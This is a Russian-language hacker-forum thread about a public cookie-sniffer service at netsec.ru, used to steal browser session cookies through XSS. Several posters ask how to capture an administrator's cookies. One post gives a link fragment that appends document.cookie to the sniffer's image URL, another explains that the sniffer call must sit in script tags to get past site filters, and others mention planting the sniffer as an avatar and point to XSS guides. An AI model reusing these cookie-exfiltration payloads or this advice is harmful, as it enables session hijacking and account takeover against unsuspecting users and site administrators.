Сниффер от netsec.ru

Discussion in 'Избранное' started by GreenBear, 31 Mar 2007.

  1. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Snork, значит на сайте на котором ставишь код, по ней заходит неавторизованный пользователь..либо вообще не так ставишь!
     
  2. Snork

    Snork New Member

    Joined:
    23 Mar 2008
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Заходят авторизированные пользователи я дажимаю в тексте добавить ссылку и пишу http://s.netsec.ru/pop.gif?"+document.cookie; нажимает админ и ниче не идет просто общая информация а кук нет....
     
  3. g-warning

    g-warning Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    76
    Likes Received:
    17
    Reputations:
    0
    Раньше мне ваще ниче не приходило, а щя проверил все работает... :)

    GreenBear спасибо =)
     
  4. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Snork, https://forum.antichat.ru/showpost.php?p=323666&postcount=1
     
  5. Snork

    Snork New Member

    Joined:
    23 Mar 2008
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Ха я нубяра напишите просто что писать в ссылке чтобы куки шли))))) умоляю.....
     
  6. Snork

    Snork New Member

    Joined:
    23 Mar 2008
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Блин я разобратсо не могу просто напишите тут что печатать чтобы када в ссылку всталяешь чтоб куки приходили и это избавит всех от флуда и меня от бана)))))))))
     
  7. Friz_Alt

    Friz_Alt New Member

    Joined:
    27 Mar 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    народ напишите ссылку, которую допустим по мылу кидать надо, что бы все работало
     
  8. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    читайте статьи. уязвимости вам никто искать не будет.
    в первом линке была ссылка на карту - там более чем достаточно материала собрано.
     
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    Объясняю на пальцах -куки возможно передать тока если ссылка на сниффер стоит в тегах <script></script> - по другому никак.... А вот как это сделать -уже другой вопрос, потмоу что практически на 98% сайтах и сервисах фильтруются теги <script> <style> <img> и другие .. А тем более на майлру
     
    #69 попугай, 19 Apr 2008
    Last edited: 19 Apr 2008
  10. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Небольшое обновление. Теперь можно загрузить свою картинку, заместо гифа 1х1.
    http://s.netsec.ru/log.php?opt
     
    2 people like this.
  11. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    820
    Reputations:
    324
    машка, а форум будет?)))
     
    1 person likes this.
  12. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Машка наконец-то ты пофиксил навигацию по страницам..
    Спасибо
     
    2 people like this.
  13. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    она и так работала в принципе ..
     
    1 person likes this.
  14. SKiMN

    SKiMN Elder - Старейшина

    Joined:
    21 Aug 2007
    Messages:
    17
    Likes Received:
    4
    Reputations:
    0
    Ребята кто не знает как заставить снифер ловить cookies

    читайте

    http://forum.antichat.ru/thread46016-XSS.html
    http://forum.antichat.ru/thread21437-XSS.html
    http://forum.antichat.ru/thread51783-XSS.html
    http://forum.antichat.ru/thread35802-XSS.html
     
  15. inlanger

    inlanger Elder - Старейшина

    Joined:
    7 Jan 2007
    Messages:
    985
    Likes Received:
    283
    Reputations:
    27
    Поставил снифф как аву на одном сайте... Отчёты идут, но куков нет.
    Сделал - грузить аватару с удалённого сервера.
    Есть советы?
     
  16. m9chik

    m9chik Elder - Старейшина

    Joined:
    20 Jun 2007
    Messages:
    68
    Likes Received:
    56
    Reputations:
    -5
    Спасибо,снифер отличный.
     
  17. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Не работала, каждый раз в гет запросы дописывался еще гет запрос:
    page=30&page=60&page=90
    И еще не было выделена курентная страница болдом
     
  18. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    Читай выше, я писал уже.

     
  19. imajo.ati

    imajo.ati Banned

    Joined:
    21 Feb 2008
    Messages:
    232
    Likes Received:
    62
    Reputations:
    8
    =(

    я вот думаю не очень это корректно.. ведь любой может удалить все логи за 30 минут.
    лучше добавить проверку какую-нибудь (по чьей картинке прошли тот и может удалять)

     
  20. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    чужие удалить нельзя.
    но ведь работало ))
     
    1 person likes this.